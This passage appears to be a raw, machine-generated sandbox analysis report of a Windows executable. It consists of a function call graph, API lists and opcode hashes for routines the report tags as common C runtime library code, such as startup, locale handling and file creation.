7ff6fe07d6d7 76798 7ff6fe0a8760 76769->76798 76770 7ff6fe07d4f8 76770->76744 76770->76745 76776 7ff6fe0a676f 76774->76776 76775 7ff6fe0a678c 76775->76754 76776->76775 76976 7ff6fe081ae8 76776->76976 76988 7ff6fe07d400 76776->76988 77073 7ff6fe07e110 76779->77073 76783 7ff6fe0b695c 37 API calls 76782->76783 76785 7ff6fe0a6697 76783->76785 76784 7ff6fe07d5d6 76787 7ff6fdfd50e0 76784->76787 76785->76784 77075 7ff6fe0b6c94 26 API calls TranslateName 76785->77075 76788 7ff6fdfd50fd 76787->76788 77076 7ff6fdfd6b70 76788->77076 76791->76753 76792 7ff6fe07db64 GetModuleHandleW 76792->76763 76793->76765 76794->76747 76795->76752 76797 7ff6fe07d6ca __scrt_dllmain_crt_thread_attach 76796->76797 76797->76769 76797->76770 76799 7ff6fe0bad18 76798->76799 76800 7ff6fe07d6dc 76799->76800 76804 7ff6fe0b68a4 76799->76804 76819 7ff6fe0b695c 76799->76819 76800->76770 76803 7ff6fe07f154 7 API calls 2 library calls 76800->76803 76803->76770 76805 7ff6fe0b68c7 76804->76805 76807 7ff6fe0b68d1 76805->76807 76834 7ff6fe0a91ac EnterCriticalSection 76805->76834 76809 7ff6fe0b6943 76807->76809 76825 7ff6fe0a87cc 76807->76825 76809->76799 76813 7ff6fe0b695b 76815 7ff6fe0b69ae 76813->76815 76816 7ff6fe0aaa74 26 API calls 76813->76816 76815->76799 76817 7ff6fe0b6998 76816->76817 76818 7ff6fe0b66e4 37 API calls 76817->76818 76818->76815 76820 7ff6fe0b69ae 76819->76820 76821 7ff6fe0b6969 76819->76821 76820->76799 76838 7ff6fe0aaa74 76821->76838 76835 7ff6fe09a6c0 EnterCriticalSection LeaveCriticalSection _CallSETranslator 76825->76835 76827 7ff6fe0a87d5 76828 7ff6fe0a87e4 76827->76828 76836 7ff6fe09a710 26 API calls 5 library calls 76827->76836 76830 7ff6fe0a8817 _CallSETranslator 76828->76830 76831 7ff6fe0a87ed IsProcessorFeaturePresent 76828->76831 76832 7ff6fe0a87fc 76831->76832 76837 7ff6fe0a8900 6 API calls 3 library calls 76832->76837 76835->76827 76836->76828 76837->76830 76839 7ff6fe0aaa85 76838->76839 76843 7ff6fe0aaa8a 76838->76843 76881 7ff6fe0a97e0 6 API calls try_get_function 76839->76881 76842 7ff6fe0aaaa9 76844 7ff6fe0a921c _wcsupr_s 14 API calls 76842->76844 76861 7ff6fe0aaa92 76842->76861 76843->76861 76882 7ff6fe0a9828 6 API calls try_get_function 76843->76882 76846 7ff6fe0aaabc 76844->76846 76845 7ff6fe0a87cc _CallSETranslator 26 API calls 76847 7ff6fe0aab1a 76845->76847 76848 7ff6fe0aaada 76846->76848 76849 7ff6fe0aaaca 76846->76849 76885 7ff6fe0a9828 6 API calls try_get_function 76848->76885 76883 7ff6fe0a9828 6 API calls try_get_function 76849->76883 76850 7ff6fe0aab0c 76863 7ff6fe0b66e4 76850->76863 76853 7ff6fe0aaad1 76884 7ff6fe0a9294 14 API calls 2 library calls 76853->76884 76854 7ff6fe0aaae2 76855 7ff6fe0aaaf8 76854->76855 76856 7ff6fe0aaae6 76854->76856 76887 7ff6fe0aa750 14 API calls _set_fmode 76855->76887 76886 7ff6fe0a9828 6 API calls try_get_function 76856->76886 76860 7ff6fe0aab00 76888 7ff6fe0a9294 14 API calls 2 library calls 76860->76888 76861->76845 76861->76850 76864 7ff6fe0b68a4 37 API calls 76863->76864 76865 7ff6fe0b670d 76864->76865 76889 7ff6fe0b63f0 76865->76889 76868 7ff6fe0b6727 76868->76820 76869 7ff6fe0aa290 wcsftime 15 API calls 76871 7ff6fe0b6738 76869->76871 76870 7ff6fe0b67d3 76905 7ff6fe0a9294 14 API calls 2 library calls 76870->76905 76871->76870 76896 7ff6fe0b69d8 76871->76896 76874 7ff6fe0b67c7 76875 7ff6fe0b67ce 76874->76875 76878 7ff6fe0b67f3 76874->76878 76876 7ff6fe09aef8 _set_fmode 14 API calls 76875->76876 76876->76870 76877 7ff6fe0b6830 76877->76870 76907 7ff6fe0b6234 23 API calls 5 library calls 76877->76907 76878->76877 76906 7ff6fe0a9294 14 API calls 2 library calls 76878->76906 76882->76842 76883->76853 76884->76861 76885->76854 76886->76853 76887->76860 76888->76861 76890 7ff6fe083ea8 TranslateName 26 API calls 76889->76890 76891 7ff6fe0b6404 76890->76891 76892 7ff6fe0b6410 GetOEMCP 76891->76892 76893 7ff6fe0b6422 76891->76893 76895 7ff6fe0b6437 76892->76895 76894 7ff6fe0b6427 GetACP 76893->76894 76893->76895 76894->76895 76895->76868 76895->76869 76897 7ff6fe0b63f0 28 API calls 76896->76897 76898 7ff6fe0b6a03 76897->76898 76899 7ff6fe0b6a40 IsValidCodePage 76898->76899 76900 7ff6fe0b6a83 memcpy_s _handle_error 76898->76900 76899->76900 76901 7ff6fe0b6a51 76899->76901 76900->76874 76902 7ff6fe0b6a88 GetCPInfo 76901->76902 76904 7ff6fe0b6a5a memcpy_s 76901->76904 76902->76900 76902->76904 76908 7ff6fe0b6500 76904->76908 76905->76868 76906->76877 76907->76870 76909 7ff6fe0b653d GetCPInfo 76908->76909 76916 7ff6fe0b6633 _handle_error 76908->76916 76912 7ff6fe0b6550 76909->76912 76909->76916 76911 7ff6fe0b65c7 76930 7ff6fe0be6ec 76911->76930 76917 7ff6fe0b92ec 76912->76917 76915 7ff6fe0be6ec 31 API calls 76915->76916 76916->76900 76918 7ff6fe083ea8 TranslateName 26 API calls 76917->76918 76919 7ff6fe0b932e 76918->76919 76935 7ff6fe0b2ff4 76919->76935 76921 7ff6fe0b9364 76922 7ff6fe0b936b _handle_error 76921->76922 76923 7ff6fe0aa290 wcsftime 15 API calls 76921->76923 76924 7ff6fe0b9390 memcpy_s wcsftime 76921->76924 76922->76911 76923->76924 76925 7ff6fe0b2ff4 _Wcsftime MultiByteToWideChar 76924->76925 76926 7ff6fe0b9428 76924->76926 76927 7ff6fe0b940a 76925->76927 76926->76922 76928 7ff6fe0a9294 __free_lconv_num 14 API calls 76926->76928 76927->76926 76929 7ff6fe0b940e GetStringTypeW 76927->76929 76928->76922 76929->76926 76931 7ff6fe083ea8 TranslateName 26 API calls 76930->76931 76932 7ff6fe0be711 76931->76932 76938 7ff6fe0be3d4 76932->76938 76934 7ff6fe0b65fa 76934->76915 76936 7ff6fe0b2ffc MultiByteToWideChar 76935->76936 76939 7ff6fe0be416 76938->76939 76940 7ff6fe0b2ff4 _Wcsftime MultiByteToWideChar 76939->76940 76942 7ff6fe0be460 76940->76942 76941 7ff6fe0be69f _handle_error 76941->76934 76942->76941 76943 7ff6fe0be493 wcsftime 76942->76943 76944 7ff6fe0aa290 wcsftime 15 API calls 76942->76944 76945 7ff6fe0b2ff4 _Wcsftime MultiByteToWideChar 76943->76945 76947 7ff6fe0be597 76943->76947 76944->76943 76946 7ff6fe0be505 76945->76946 76946->76947 76964 7ff6fe0a9bf4 76946->76964 76947->76941 76974 7ff6fe0a9294 14 API calls 2 library calls 76947->76974 76951 7ff6fe0be554 76951->76947 76954 7ff6fe0a9bf4 __crtLCMapStringW 7 API calls 76951->76954 76952 7ff6fe0be5a6 76953 7ff6fe0aa290 wcsftime 15 API calls 76952->76953 76956 7ff6fe0be5c0 wcsftime 76952->76956 76953->76956 76954->76947 76955 7ff6fe0a9bf4 __crtLCMapStringW 7 API calls 76958 7ff6fe0be641 76955->76958 76956->76947 76956->76955 76957 7ff6fe0be676 76957->76947 76973 7ff6fe0a9294 14 API calls 2 library calls 76957->76973 76958->76957 76972 7ff6fe0b3050 WideCharToMultiByte 76958->76972 76965 7ff6fe0a9378 try_get_function 5 API calls 76964->76965 76966 7ff6fe0a9c32 76965->76966 76967 7ff6fe0a9c89 76966->76967 76968 7ff6fe0a9c37 LCMapStringEx 76966->76968 76975 7ff6fe0a9cd0 5 API calls 2 library calls 76967->76975 76969 7ff6fe0a9cbb 76968->76969 76969->76947 76969->76951 76969->76952 76971 7ff6fe0a9c93 LCMapStringW 76971->76969 76973->76947 76974->76941 76975->76971 76977 7ff6fe081b12 76976->76977 76978 7ff6fe0a921c _wcsupr_s 14 API calls 76977->76978 76979 7ff6fe081b31 76978->76979 77005 7ff6fe0a9294 14 API calls 2 library calls 76979->77005 76981 7ff6fe081b3f 76982 7ff6fe0a921c _wcsupr_s 14 API calls 76981->76982 76985 7ff6fe081b69 76981->76985 76983 7ff6fe081b5b 76982->76983 77006 7ff6fe0a9294 14 API calls 2 library calls 76983->77006 76987 7ff6fe081b72 76985->76987 77007 7ff6fe0a9ac8 6 API calls try_get_function 76985->77007 76987->76776 76989 7ff6fe07d410 76988->76989 77008 7ff6fe0a67cc 76989->77008 76991 7ff6fe07d41c 77014 7ff6fe07d6f4 76991->77014 76994 7ff6fe07d434 _RTC_Initialize 77003 7ff6fe07d489 76994->77003 77019 7ff6fe07d8a4 76994->77019 76995 7ff6fe07d4b5 76995->76776 76997 7ff6fe07d449 77022 7ff6fe0a5f54 76997->77022 77001 7ff6fe07d45e 77002 7ff6fe0a6e98 26 API calls 77001->77002 77002->77003 77004 7ff6fe07d4a5 77003->77004 77055 7ff6fe07d9d4 7 API calls 2 library calls 77003->77055 77004->76776 77005->76981 77006->76985 77007->76985 77009 7ff6fe0a67dd 77008->77009 77010 7ff6fe0a67e5 77009->77010 77011 7ff6fe09aef8 _set_fmode 14 API calls 77009->77011 77010->76991 77012 7ff6fe0a67f4 77011->77012 77056 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 77012->77056 77015 7ff6fe07d705 77014->77015 77018 7ff6fe07d70a __scrt_release_startup_lock 77014->77018 77015->77018 77057 7ff6fe07d9d4 7 API calls 2 library calls 77015->77057 77017 7ff6fe07d77e 77018->76994 77058 7ff6fe07d868 77019->77058 77021 7ff6fe07d8ad 77021->76997 77023 7ff6fe0a5f74 77022->77023 77032 7ff6fe07d455 77022->77032 77024 7ff6fe0a5f92 77023->77024 77025 7ff6fe0a5f7c 77023->77025 77027 7ff6fe0b695c 37 API calls 77024->77027 77026 7ff6fe09aef8 _set_fmode 14 API calls 77025->77026 77028 7ff6fe0a5f81 77026->77028 77029 7ff6fe0a5f97 77027->77029 77063 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 77028->77063 77064 7ff6fe0b6114 30 API calls 4 library calls 77029->77064 77032->77003 77054 7ff6fe07d97c InitializeSListHead 77032->77054 77033 7ff6fe0a5fae 77065 7ff6fe0a5d34 26 API calls 77033->77065 77035 7ff6fe0a5feb 77066 7ff6fe0a5ef4 14 API calls 2 library calls 77035->77066 77037 7ff6fe0a6001 77038 7ff6fe0a6021 77037->77038 77039 7ff6fe0a6009 77037->77039 77068 7ff6fe0a5d34 26 API calls 77038->77068 77040 7ff6fe09aef8 _set_fmode 14 API calls 77039->77040 77042 7ff6fe0a600e 77040->77042 77067 7ff6fe0a9294 14 API calls 2 library calls 77042->77067 77044 7ff6fe0a6043 77072 7ff6fe0a9294 14 API calls 2 library calls 77044->77072 77045 7ff6fe0a601c 77045->77032 77047 7ff6fe0a603d 77047->77044 77048 7ff6fe0a606f 77047->77048 77049 7ff6fe0a6088 77047->77049 77069 7ff6fe0a9294 14 API calls 2 library calls 77048->77069 77071 7ff6fe0a9294 14 API calls 2 library calls 77049->77071 77052 7ff6fe0a6078 77070 7ff6fe0a9294 14 API calls 2 library calls 77052->77070 77055->76995 77056->77010 77057->77017 77059 7ff6fe07d882 77058->77059 77061 7ff6fe07d87b 77058->77061 77062 7ff6fe0a85ec 26 API calls 77059->77062 77061->77021 77062->77061 77063->77032 77064->77033 77065->77035 77066->77037 77067->77045 77068->77047 77069->77052 77070->77045 77071->77044 77072->77032 77074 7ff6fe07db37 GetStartupInfoW 77073->77074 77074->76756 77075->76785 77077 7ff6fdfd6b92 77076->77077 77089 7ff6fdfe4a00 77077->77089 77080 7ff6fdfd6bee 77102 7ff6fdfd5250 60 API calls _wcsupr_s 77080->77102 77081 7ff6fdfd6c01 77092 7ff6fdfdde20 77081->77092 77085 7ff6fdfd5300 96 API calls 77086 7ff6fdfd6c3d 77085->77086 77095 7ff6fdfda810 77086->77095 77088 7ff6fdfd5116 77088->76792 77103 7ff6fdfda530 77089->77103 77091 7ff6fdfd6be1 77091->77080 77091->77081 77093 7ff6fdfd3037 _mbsncpy_s 94 API calls 77092->77093 77094 7ff6fdfd6c2b 77093->77094 77094->77085 77144 7ff6fdffe2c0 77095->77144 77097 7ff6fdfd3037 _mbsncpy_s 94 API calls 77099 7ff6fdfda842 77097->77099 77098 7ff6fdfda937 77100 7ff6fdfdb260 6 API calls 77098->77100 77099->77097 77099->77098 77101 7ff6fdfda965 77100->77101 77101->77088 77102->77088 77112 7ff6fdff6950 77103->77112 77105 7ff6fdfda559 77107 7ff6fdfda55d _handle_error 77105->77107 77108 7ff6fdfda57c memcpy_s 77105->77108 77116 7ff6fdff8930 77105->77116 77107->77091 77108->77107 77109 7ff6fdfd3037 _mbsncpy_s 94 API calls 77108->77109 77110 7ff6fdfda7cb 77109->77110 77110->77107 77119 7ff6fdfdb260 77110->77119 77113 7ff6fdff6963 LoadLibraryExA 77112->77113 77114 7ff6fdff6982 Concurrency::details::_UnrealizedChore::_CancelViaToken 77112->77114 77113->77114 77115 7ff6fdff6986 GetProcAddressForCaller 77113->77115 77114->77105 77115->77114 77117 7ff6fdff8bb0 3 API calls 77116->77117 77118 7ff6fdff894c memcpy_s 77117->77118 77118->77108 77120 7ff6fdfdb28a 77119->77120 77127 7ff6fdff3ed0 77120->77127 77122 7ff6fdfdb29e 77130 7ff6fdff27e0 77122->77130 77124 7ff6fdfdb39c 77124->77107 77125 7ff6fdfdb2a8 77125->77124 77134 7ff6fdff8ad0 77125->77134 77138 7ff6fe02a990 77127->77138 77129 7ff6fdff3ef3 77129->77122 77131 7ff6fdff2802 77130->77131 77133 7ff6fdff280c 77130->77133 77143 7ff6fe027300 VirtualFree 77131->77143 77133->77125 77135 7ff6fdff8af3 77134->77135 77136 7ff6fdff8b35 77135->77136 77137 7ff6fdff8c90 4 API calls 77135->77137 77136->77124 77137->77135 77141 7ff6fe02a9ca 77138->77141 77139 7ff6fe02aa0d 77139->77129 77141->77139 77142 7ff6fe02ada0 VirtualFree 77141->77142 77142->77141 77143->77133 77145 7ff6fdffe33e 77144->77145 77146 7ff6fdffe2f6 77144->77146 77145->77099 77150 7ff6fdffe6e0 WaitForSingleObject DeleteCriticalSection 77146->77150 77148 7ff6fdffe300 77151 7ff6fdff3bb0 94 API calls 3 library calls 77148->77151 77150->77148 77151->77145 77152 7ff6fe017930 77157 7ff6fdfdfb80 94 API calls 6 library calls 77152->77157 77154 7ff6fe01794e 77158 7ff6fe0a55c4 77154->77158 77156 7ff6fe01795d 77157->77154 77186 7ff6fe081ab8 77158->77186 77161 7ff6fe0a5608 77164 7ff6fe0a562b 77161->77164 77165 7ff6fe0a560d 77161->77165 77162 7ff6fe0a56ea 77192 7ff6fe0a8b34 9 API calls _isindst 77162->77192 77166 7ff6fe0a5621 77164->77166 77169 7ff6fe09aef8 _set_fmode 14 API calls 77164->77169 77165->77166 77189 7ff6fe0b0d88 31 API calls 4 library calls 77165->77189 77191 7ff6fe0a9294 14 API calls 2 library calls 77166->77191 77172 7ff6fe0a5650 77169->77172 77171 7ff6fe0a5699 _handle_error 77171->77156 77173 7ff6fe09aef8 _set_fmode 14 API calls 77172->77173 77174 7ff6fe0a5657 77173->77174 77175 7ff6fe0a5673 77174->77175 77176 7ff6fe0a567c 77174->77176 77177 7ff6fe09aef8 _set_fmode 14 API calls 77175->77177 77178 7ff6fe09aef8 _set_fmode 14 API calls 77176->77178 77177->77166 77179 7ff6fe0a5681 77178->77179 77180 7ff6fe0a569e 77179->77180 77181 7ff6fe09aef8 _set_fmode 14 API calls 77179->77181 77182 7ff6fe09aef8 _set_fmode 14 API calls 77180->77182 77183 7ff6fe0a568b 77181->77183 77182->77166 77183->77180 77184 7ff6fe0a5690 77183->77184 77190 7ff6fe0a9294 14 API calls 2 library calls 77184->77190 77193 7ff6fe081748 77186->77193 77188 7ff6fe081ad2 77188->77161 77188->77162 77189->77166 77190->77171 77191->77171 77225 7ff6fe0a91ac EnterCriticalSection 77193->77225 77195 7ff6fe081774 77196 7ff6fe08177c 77195->77196 77199 7ff6fe08179f 77195->77199 77197 7ff6fe09aef8 _set_fmode 14 API calls 77196->77197 77198 7ff6fe081781 77197->77198 77200 7ff6fe0a8b14 _invalid_parameter_noinfo 23 API calls 77198->77200 77201 7ff6fe08189c 41 API calls 77199->77201 77202 7ff6fe08178d 77200->77202 77204 7ff6fe0817a7 _CallSETranslator 77201->77204 77203 7ff6fe0a9200 _isindst LeaveCriticalSection 77202->77203 77205 7ff6fe081807 77203->77205 77204->77202 77206 7ff6fe0817e3 77204->77206 77207 7ff6fe0817d3 77204->77207 77205->77188 77209 7ff6fe0a8840 __std_exception_copy 23 API calls 77206->77209 77208 7ff6fe09aef8 _set_fmode 14 API calls 77207->77208 77208->77202 77210 7ff6fe0817f1 77209->77210 77210->77202 77211 7ff6fe081824 77210->77211 77212 7ff6fe0a8b34 _isindst 9 API calls 77211->77212 77213 7ff6fe081838 _vswprintf 77212->77213 77214 7ff6fe08184a 77213->77214 77218 7ff6fe081874 77213->77218 77215 7ff6fe09aef8 _set_fmode 14 API calls 77214->77215 77216 7ff6fe08184f 77215->77216 77217 7ff6fe0a8b14 _invalid_parameter_noinfo 23 API calls 77216->77217 77224 7ff6fe08185a 77217->77224 77219 7ff6fe0a91ac _isindst EnterCriticalSection 77218->77219 77220 7ff6fe08187e 77219->77220 77221 7ff6fe08189c 41 API calls 77220->77221 77222 7ff6fe081887 77221->77222 77223 7ff6fe0a9200 _isindst LeaveCriticalSection 77222->77223 77223->77224 77224->77188 77226 7ff6fdfd4326 77228 7ff6fdfd42ec 77226->77228 77227 7ff6fdfdaca0 _free_nolock 94 API calls 77231 7ff6fdfd3d79 77227->77231 77228->77231 77232 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 77228->77232 77229 7ff6fdfd4978 77235 7ff6fe0270e0 96 API calls 77229->77235 77230 7ff6fdfd4941 77230->77230 77231->77227 77231->77229 77231->77230 77232->77231 77234 7ff6fdfd5066 77235->77234 77236 7ff6fdfd4a47 77237 7ff6fdfd4a30 77236->77237 77239 7ff6fdff40a0 96 API calls _set_fmode 77237->77239 77239->77237

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00007FF6FE0B1E0C Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 7ff6fe0b1e0c-7ff6fe0b1e7f call 7ff6fe0b19f0 3 7ff6fe0b1e81-7ff6fe0b1e8a call 7ff6fe09aed8 0->3 4 7ff6fe0b1e99-7ff6fe0b1ea3 call 7ff6fe0b79a0 0->4 9 7ff6fe0b1e8d-7ff6fe0b1e94 call 7ff6fe09aef8 3->9 10 7ff6fe0b1ebe-7ff6fe0b1f27 CreateFileW 4->10 11 7ff6fe0b1ea5-7ff6fe0b1ebc call 7ff6fe09aed8 call 7ff6fe09aef8 4->11 27 7ff6fe0b21d2-7ff6fe0b21f2 9->27 12 7ff6fe0b1fa4-7ff6fe0b1faf GetFileType 10->12 13 7ff6fe0b1f29-7ff6fe0b1f2f 10->13 11->9 19 7ff6fe0b1fb1-7ff6fe0b1fec GetLastError call 7ff6fe09ae88 CloseHandle 12->19 20 7ff6fe0b2002-7ff6fe0b2009 12->20 16 7ff6fe0b1f71-7ff6fe0b1f9f GetLastError call 7ff6fe09ae88 13->16 17 7ff6fe0b1f31-7ff6fe0b1f35 13->17 16->9 17->16 25 7ff6fe0b1f37-7ff6fe0b1f6f CreateFileW 17->25 19->9 35 7ff6fe0b1ff2-7ff6fe0b1ffd call 7ff6fe09aef8 19->35 23 7ff6fe0b2011-7ff6fe0b2014 20->23 24 7ff6fe0b200b-7ff6fe0b200f 20->24 30 7ff6fe0b201a-7ff6fe0b206b call 7ff6fe0b78b8 23->30 31 7ff6fe0b2016 23->31 24->30 25->12 25->16 38 7ff6fe0b206d-7ff6fe0b2079 call 7ff6fe0b1bfc 30->38 39 7ff6fe0b208a-7ff6fe0b20ba call 7ff6fe0b175c 30->39 31->30 35->9 38->39 47 7ff6fe0b207b 38->47 45 7ff6fe0b20bc-7ff6fe0b20ff 39->45 46 7ff6fe0b207d-7ff6fe0b2085 call 7ff6fe0ad5d8 39->46 48 7ff6fe0b2121-7ff6fe0b212c 45->48 49 7ff6fe0b2101-7ff6fe0b2105 45->49 46->27 47->46 52 7ff6fe0b21d0 48->52 53 7ff6fe0b2132-7ff6fe0b2136 48->53 49->48 51 7ff6fe0b2107-7ff6fe0b211c 49->51 51->48 52->27 53->52 55 7ff6fe0b213c-7ff6fe0b2181 CloseHandle CreateFileW 53->55 56 7ff6fe0b2183-7ff6fe0b21b1 GetLastError call 7ff6fe09ae88 call 7ff6fe0b7ae0 55->56 57 7ff6fe0b21b6-7ff6fe0b21cb 55->57 56->57 57->52
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1330151763-0
                                                                                                                                                                        • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction ID: 0c09bd8aaf0776702dc5a30b405a1347687a942498198be3e7c33f5ea16c0f06
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CC17036B24A4685EB10CF68C4905AD3B75FBA9B98B104226EA2ED77D9DF38D461C340
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE0A9BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$try_get_function
                                                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                                                        • API String ID: 1203122356-3893581201
                                                                                                                                                                        • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                        • Instruction ID: b3a541c473176c8fafab018ea3948e44824417c59caf673506351939eb75a334
                                                                                                                                                                        • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D112F35708B8186D760CB55F48029AB7A0F7D9B90F544136EA9D83B59DF3CD4508B40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFF6950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCallerLibraryLoadProc
                                                                                                                                                                        • String ID: SystemFunction036$advapi32.dll
                                                                                                                                                                        • API String ID: 4215043672-1354007664
                                                                                                                                                                        • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction ID: 7aa796dc2e0398b2d4c3aeed76692f1ac2d2ba812a4f57b062a8cece45676dfd
                                                                                                                                                                        • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction Fuzzy Hash: F7113C22E1EA4381EB609B10E89473627A4FBD03A4F500231E9AEC32D8FF7CE464C650
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE05F000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF6FE05EDD3), ref: 00007FF6FE05F013
                                                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF6FE05EDD3), ref: 00007FF6FE05F034
                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FE0217E7), ref: 00007FF6FE05F061
                                                                                                                                                                          • Part of subcall function 00007FF6FE05EE80: GetLastError.KERNEL32 ref: 00007FF6FE05EE96
                                                                                                                                                                          • Part of subcall function 00007FF6FE05EE80: FormatMessageA.KERNEL32 ref: 00007FF6FE05EECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
